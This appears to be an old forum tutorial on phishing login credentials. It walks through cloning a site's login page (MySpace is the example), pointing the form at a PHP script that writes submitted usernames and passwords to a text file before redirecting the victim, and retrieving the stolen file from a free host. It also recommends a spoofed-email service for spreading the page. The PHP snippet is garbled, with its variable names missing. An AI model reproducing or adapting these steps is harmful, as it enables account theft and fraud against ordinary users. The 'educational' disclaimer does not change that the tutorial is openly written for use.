-
Disclaimer::
This tutorial is for educational purposes, whatever anyone does with it is of no concern of mine.
The "passwords.txt" Link is only for show to show what it will look like =]
-
::Get the pages Source Code::
First you should goto the site you want to phish, and goto a login page, make sure you are logged out to get onto the logon page. Press "View > Source", Copy and Paste what you get into a blank NotePad File, Save it as "Login.htm"
::Making the Phish File::
Open a new NotePad File and Paste the following Code into it
Change the "http://myspace.com" to the site you are phishing.Code:<?php header ('Location: http://myspace.com '); = fopen("passwords.txt", "a"); foreach(Array as => ) { fwrite(, ); fwrite(, "="); fwrite(, ); fwrite(, "rn"); } fwrite(, "rn"); fclose(); exit; ?>
Save the file as "phish.php"
Go back to your login.htm file and click edit. Press CTRL+F and type in action= in the box. Keep pressing find until you find something that says action=(something that has to do with logging in). Replace that with phish.php. You have a phisher =].
::How to access the passwords::
To access the details of your victims you need to enter the domain that the hosting service give you and put "passwords.txt" at the end of it.
For Example. I would type in: http://freegametime.byethost4.com/passwords.txt
::Helpful Links::
mmoMailer.com - Ready, Set, Scam! - This allows you to send fake emails from fake email addresses and send your phishing site out.
http://bytehost.com/ - This is a pretty good hosting site without ads and they offer you a free .co.cc domain name when you are signing up for free hosting =].
Any Questions just ask =]